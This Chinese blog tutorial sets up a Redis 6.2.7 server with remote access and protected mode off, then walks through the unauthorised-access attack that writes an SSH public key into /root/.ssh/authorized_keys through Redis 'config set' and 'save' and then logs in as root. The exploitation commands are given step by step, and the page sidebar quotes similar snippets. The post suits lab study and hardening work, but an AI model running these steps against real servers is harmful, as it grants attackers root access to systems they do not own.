Redis数据库与远程连接漏洞利用

已于 2022-10-07 20:33:45 修改
阅读量666 收藏 4
点赞数 3
文章标签: redis 数据库
于 2022-10-04 11:42:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x506812022/article/details/127157367
版权

目录

一、Redis数据库介绍

二、部署

创建redis数据库

开启一个新的数据库

开始远程访问

三、redis漏洞利用

redis未授权访问

用客户机去远程连接redis的ssh服务

总结

一、Redis数据库介绍

非关系型数据库,采用键/值(key/value)对的方式进行存放。

二、部署

  • 创建redis数据库

#安装编译环境

yum -y install gcc gcc-c++ make vim net-tools wget cmake

#下载redis数据库6.2.7版本

wget https://download.redis.io/releases/redis-6.2.7.tar.gz

#解压

tar zxf redis-6.2.7.tar.gz

#进入redis目录

cd redis-6.2.7

#开始下载并安装

make                                                                       #下载

make install PREFIX=/usr/local/redis               #安装到/usr/local/目录下

#添加环境变量

ln -s /usr/local/redis/bin/* /usr/local/bin/

注:这时已经可以运行redis数据库,但是是受远程保护的主redis数据库,远程连接的主机无法访问,所以需要进一步的操作

redis-server        #可以查看启动

 

  • 开启一个新的数据库

#进入redis目录

cd /root/redis-6.2.7/

#修改执行文件

vim utils/install_server.sh

#在末行模式输入set nu查看行数,将76到84行全部注释,如果不注释在执行时会报错

:set nu

 :wq

#开始执行文件

./utils/install_server.sh

一路回车

#此时会有新数据库的远程文件生成,修改远程文件可以使其被远程访问

vim /etc/redis/6379.conf

修改如下数据:

#bind 127.0.0.1 -::1                #将其注释掉

protected-mode no                #远程保护关闭

port 6399                                #修改端口号进行验证

requirepass Woniu.123        #将密码前的注释去掉并修改密码,启用密码提高安全性

:wq

#开启新的redis数据库进行验证

redis-server /etc/redis/6379.conf

netstat -anpt

  • 开始远程访问

注:远程的客户机也需要有redis数据库的客户端(其实也需要安装redis数据库)

#安装编译环境

yum -y install gcc gcc-c++ make vim net-tools wget cmake

#下载redis数据库6.2.7版本

wget https://download.redis.io/releases/redis-6.2.7.tar.gz

#解压

tar zxf redis-6.2.7.tar.gz

#进入redis目录

cd redis-6.2.7

#开始下载并安装

make                                                                       #下载

make install PREFIX=/usr/local/redis               #安装到/usr/local/目录下

#添加环境变量

ln -s /usr/local/redis/bin/* /usr/local/bin/

#启用远程连接

redis-cli -h 192.168.137.130 -p 6399 -a Woniu.123

#-h          要连接的服务器的IP

#-p          要连接服务器的端口

#-a          要连接到服务器的密码

三、redis漏洞利用

  • redis未授权访问

  • 注:此漏洞需要服务器有.ssh文件,以及没有禁用config命令

在客户机上操作:

#先生成ssh密钥对

ssh-keygen -t rsa

可以设置密码也可以不设置,我是没有设置一路回车

 #此时就有了公钥与私钥的存放目录.ssh

 #将公钥文件重新存放,前后增加换行从而保证前后不乱码

cd .ssh/                #进入文件目录

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt

#将公钥文件存入redis服务器中

cat /root/.ssh/key.txt | redis-cli -h 192.168.137.130 -p 6399 -a Woniu.123 -x set aaa

#验证自己的主服务器会发现多出一个aaa的键

 #远程连接redis

redis-cli -h 192.168.137.130 -p 6399 -a Woniu.123

#使用config set去修改redis数据存放目录

config set dir /root/.ssh/

#验证

 #使用config set去修改redis的数据存放名

config set dbfilename authorized_keys

#保存配置

save

  • 用客户机去远程连接redis的ssh服务

ssh root@192.168.137.130

总结

redis数据库有安全漏洞,所以我们需要加强自身的安全防护。

迷雾中影子
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
redis远程连接可视化工具
02-25
redis远程连接工具,有需要的可以下载,比较方便
Redis数据库漏洞防护
creamy521的专栏
04-24 550
转自:http://www.hackdig.com/11/hack-28666.htm Redis是一个高性能的数据库Redis Crackit及Redis安全漏洞本质上是由于Redis自身缺乏安全防护机制,同时Redis的使用者又未曾遵循官方的安全规范所导致的。 Redis安全漏洞 对于安全漏洞的防护,很多面向大数据的应用架构(NOSQL、Caching)都存在类
如何远程链接redis
热门推荐
yyhzzzzzz的博客
03-27 2万+
远程链接redis
redis远程连接
zlc1990628的博客
02-20 526
redis 远程连接方法 解决方法 1、修改redis服务器的配置文件 viredis.conf 注释以下绑定的主机地址 #bind127.0.0.1 或 vim redis.conf bind 0.0.0.0 protected-mode no 2、修改redis服务器的参数配置 修改redis的守护进程为no,不启用 127.0.0.1:6379>...
远程连接redis
weixin_48878207的博客
01-21 109
修改redis.conf配置文件 1.加#注释第71行 2.修改 yes 为 no 3.取消509行注释,设置自己的登录密码 4.使用redis desktop manager 连接
多语言微交易多行情盘PHP平台源码扩展redis phpinfo
05-09
环境ngingx mysql5.6 php7.0扩展redis phpinfo ...已修复多出 远程攻击漏洞 上传搭建 导入数据库 然后 application/config.php 配置数据库 coller.html 挂波动行 后台lord默认账号admin密码123456
多语言微交易多行情盘PHP平台源码扩展redis phpinfo.zip
最新发布
01-10
环境ngingx mysql5.6 php7.0扩展redis phpinfo ...已修复多出 远程攻击漏洞 上传搭建 导入数据库 然后 application/config.php 配置数据库 coller.html 挂波动行 后台lord默认账号admin密码123456
pocsuite3:pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试框架
02-05
pocsuite仅用于安全测试目的总览pocsuite3是由开发的开源远程漏洞测试和概念验证开发框架。 它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。产品特点PoC脚本可以以不同的方式在...
ThinkPHP v6.0.7
04-21
CLI支持-支持基于命令行的应用开发RPC支持-提供包括PHPRpc、HProse、jsonRPC和Yar在内远程调用解决方案MongoDb支持-提供NoSQL的支持缓存支持-提供了包括文件、数据库、Memcache、Xcache、Redis等多种类型的缓存支持...
java开源包4
06-28
它的设计初衷就是为了提高数据库连接池的性能,根据某些测试数据发现,BoneCP是最快的连接池。BoneCP很小,只有四十几K(运行时需要slf4j和guava的支持,这二者加起来就不小了),而相比之下 C3P0 要六百多K。 异步...
Redis数据库漏洞总结
星落的博客
04-13 1161
Redis简介 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。是非关系型数据库 Redis基本常识 Redis默认开放端口为6379端口,其配置文件位置为 /etc/redis/redis.conf ,Redis默认是不需要账号密码的,因此Redis的未授权漏洞一直很火。 Redis常用命令 set xl 123 ...
Redis远程命令执行漏洞修复方法(CNVD-2019-21763)
zhangyuxun3的博客
03-30 3240
漏洞详情: 近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。 漏洞评级: 高危漏洞 影响范围: Redis版本 >=4.0、>=5.0 漏洞复现 安装最新版 redis (5.0.5)并正常启动: 在攻击机上执行EXP,同时可以看到服务器上的日志输出: 成功后可以执行任意命令: 修复方案 (由于目前Redis厂商未发布正式版本的修复
公网远程连接Redis数据库【内网穿透】
睿的博客
05-25 2868
Redis作为一款高速缓存的key value键值对的数据库,在许许多多的场景中广泛使用,由于是把数据存储在内存中,所以读写效率极高。下面介绍如何在内网虚拟机的linux中搭建redis并通过cpolar内网穿透实现公网访问。
Redis - - Redis 远程代码执行漏洞
weixin_34150830的博客
12-14 465
1,利用redis漏洞,远程登录服务器 1.1 登录远程 redis 并写入ssh公钥 [root@test ~]# redis-cli -h 192.168.168.168 -p 6379 -a 123456 # 设置路径等配置(必须有写入权限) 192.168.168.168:6379> config set dir /root/.ssh OK # 上传公钥的备份文件名字为autho...
公网远程连接Redis数据库详解
小洁洁
08-19 1898
Redis作为一款高速缓存的key value键值对的数据库,在许许多多的场景中广泛使用,由于是把数据存储在内存中,所以读写效率极高。 下面介绍如何在内网虚拟机的linux中搭建redis并通过cpolar内网穿透实现公网访问
利用redis的未授权漏洞登陆远程主机
biziwaiwai的博客
02-13 522
(1)redis是什么:Redis是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库(2)redis的未授权访问漏洞是redis数据库的登陆设置密码,所以未开启用户认证,可以导致任意的用户可以访问目标服务器的情况下未授权访问redis以及读取、更改redis的数据,攻击者可以利用redis的相关方法在redis的服务器上写入公钥,进而可以使用对应的...
Redis远程连接Redis配置
Ruyi_squad的博客
08-07 7136
远程连接RedisRedis配置 远程连接redis测试 1、redis.conf的配置 1.1 bind 127.0.0.1检查该行如果没有前面加#注释,如果已经注释掉继续下一步 1.2 Protrcted mode yes 检查该行,如果是yes该为no,关闭保护模式 1.3 防火墙配置 第一种方法:永久关闭防火墙 ...
redis数据库连接
07-27
要连接Redis数据库,你可以使用相应的客户端库,比如Python中的redis模块。以下是一个连接Redis数据库的示例代码: ```python import redis # 创建Redis连接 r = redis.Redis(host='localhost', port=6379, db=0) # 执行Redis操作 r.set('key', 'value') value = r.get('key') # 关闭连接 r.close() ``` 在上面的示例中,通过`redis.Redis()`创建了一个与本地Redis数据库的连接。你可以根据实际情况修改`host`和`port`参数来连接特定的Redis实例。然后,使用`r.set()`方法设置一个键值对,并使用`r.get()`方法获取键对应的值。最后,使用`r.close()`关闭连接。 请注意,这只是一个简单的示例,实际中可能需要根据具体需求进行配置和处理异常情况。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值